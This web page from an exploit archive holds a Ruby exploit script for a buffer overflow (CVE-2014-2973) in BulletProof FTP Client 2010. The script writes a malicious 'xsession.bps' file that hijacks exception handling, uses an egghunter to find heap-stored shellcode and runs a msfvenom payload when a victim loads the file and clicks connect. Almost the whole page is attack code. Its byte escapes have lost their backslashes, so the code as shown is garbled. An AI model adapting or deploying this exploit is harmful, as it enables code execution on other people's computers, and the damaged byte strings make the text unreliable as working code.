Home / exploits BulletProof FTP Client 2010 Buffer Overflow
Posted on 10 December 2014
#!/usr/bin/env ruby # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit # Date: Dec 03 2014 # Vulnerability Discovery: Gabor Seljan # Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com> # Software Link: http://www.bpftp.com/ # Version: 2010.75.0.76 # Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600] # CVE: CVE-2014-2973 # Notes: bypass buffer size limitation for bigger payload. Allocate 2nd # shellcode in heap and copy back to stack. This exploit use egghunter # to locate 2nd shellcode in heap and copy to stack. Load the exploit file # and click connect to trigger the exploit. # Offset seh = 93 filename = "xsession.bps" buff = "A" * 500 # ./msfvenom -p windows/exec CMD=mspaint -b 'x00x0ax0dx1a' -e x86/shikata_ga_nai -f ruby heap_sc = "w00tw00t" + "xdaxc4xbfxd7xecx92xb5xd9x74x24xf4x5dx33xc9" + "xb1x32x83xedxfcx31x7dx16x03x7dx16xe2x22x10" + "x7ax3cxccxe9x7bx5fx45x0cx4ax4dx31x44xffx41" + "x32x08x0cx29x16xb9x87x5fxbexcex20xd5x98xe1" + "xb1xdbx24xadx72x7dxd8xacxa6x5dxe1x7exbbx9c" + "x26x62x34xccxffxe8xe7xe1x74xacx3bx03x5axba" + "x04x7bxdfx7dxf0x31xdexadxa9x4exa8x55xc1x09" + "x08x67x06x4ax74x2ex23xb9x0fxb1xe5xf3xf0x83" + "xc9x58xcfx2bxc4xa1x08x8bx37xd4x62xefxcaxef" + "xb1x8dx10x65x27x35xd2xddx83xc7x37xbbx40xcb" + "xfcxcfx0exc8x03x03x25xf4x88xa2xe9x7cxcax80" + "x2dx24x88xa9x74x80x7fxd5x66x6cxdfx73xedx9f" + "x34x05xacxf5xcbx87xcbxb3xccx97xd3x93xa4xa6" + "x58x7cxb2x36x8bx38x4cx7dx91x69xc5xd8x40x28" + "x88xdaxbfx6fxb5x58x35x10x42x40x3cx15x0exc6" + "xadx67x1fxa3xd1xd4x20xe6xbcxa9xaex68x57x20" + "x3bx6b" # badchar 'x00x0ax0dx1axb1x83xb2' # find 1st heap address heap_addr = "x50" + # push eax "xbbxafx77x77x77" + # mov ebx,777777afh "x81xebx7fx77x77x77" + # sub ebx,7777777f = 0x30 (TEB) "x64x8bx1b" + # mov ebx,dword ptr fs:[ebx] "xb9x0fx78x77x77" + # mov ebx,7777780Fh "x81xe9x7fx77x77x77" + # sub ecx,7777777fh = 0x90 (PEB) "x8bx1cx0b" + # mov ebx,dword ptr [ebx+ecx] "x8bx1b" # mov ebx,dword ptr [ebx] egghunter = "x8bxd3" + # mov edx,ebx "xebx05" + # jmp $+0x5 (#2) "x66x81xcaxffx0f" + # or dx, 0xfff (#1) "x42" + # inc edx (#2) "x52" + # push edx "x6ax02" + # push 2 "x58" + # pop eax "xcdx2e" + # int 0x2e "x3cx05" + # cmp al,5 "x5a" + # pop edx "x74xef" + # je $-0xf (#1) "xb8x77x30x30x74" + # mov eax,0x74303077 (our tag 'w00t') "x8bxfa" + # mov edi,edx "xaf" + # scasd eax, dword ptr es:[edi] "x75xea" + # jne $-0x14 (#2) "xaf" + # scasd eax, dword ptr es:[edi] "x75xe7" + # jne $-0x17 (#2) copy_sc = "x58" + # pop eax "x05x54xf2xffxff" + # add eax,-3500 "x89xfe" + # mov esi,edi "x89xc7" + # mov edi,eax "xb9x61x78x77x77" + # mov ecx,0x77777861 "x81xe9x7fx77x77x77" + # sub ecx,0x7777777f "xf2xa4" + # rep movsb "xffxe0" # jmp eax stack_sc = heap_addr + egghunter + copy_sc # GetPC buff[1,2] = "xd9xeb" # fldpi buff[3,5] = "x9bxd9x74x24xf4" # fstenv [esp-0xc] buff[8,1] = "x58" # pop eax # pop esp into eax # FixRet stub buff[9,7] = "xc7x40x44x45x45x45x45" # (1) buff[16,7] = "xc7x40x58x45x45x45x45" # (2) place holder for jmp buff[23,7] = "xc7x40x5cx45x45x45x45" # (3) place holder for ppr buff[30,stack_sc.size] = stack_sc # repair stack buff[12,4] = buff[seh-24,4] # replace with original sc (1) buff[19,4] = buff[seh-4,4] # replace with original sc (2) buff[26,4] = buff[seh,4] # replace with original sc (3) buff[seh-4,4] = "xebxa6x41x41" # jmp $-166 buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null bps = "x54x68x69x73x20x69x73x20x61x20x42x75" + "x6Cx6Cx65x74x50x72x6Fx6Fx66x20x46x54" + "x50x20x43x6Cx69x65x6Ex74x20x53x65x73" + "x73x69x6Fx6Ex2Dx46x69x6Cx65x20x61x6E" + "x64x20x73x68x6Fx75x6Cx64x20x6Ex6Fx74" + "x20x62x65x20x6Dx6Fx64x69x66x69x65x64" + "x20x64x69x72x65x63x74x6Cx79x2Ex0Dx0A" + buff + "x0Dx0Ax61x6E" + "x6Fx6Ex79x6Dx6Fx75x73x0Dx0A" + heap_sc + "x62x70x69" + "x63x70x6Cx6Ex6Bx69x69x62x6Dx66x65x0D" + "x0A" File.open(filename,"wb") do |fp| fp.write(bps) puts "Exploit file: #{filename} size: #{bps.size}" fp.close end
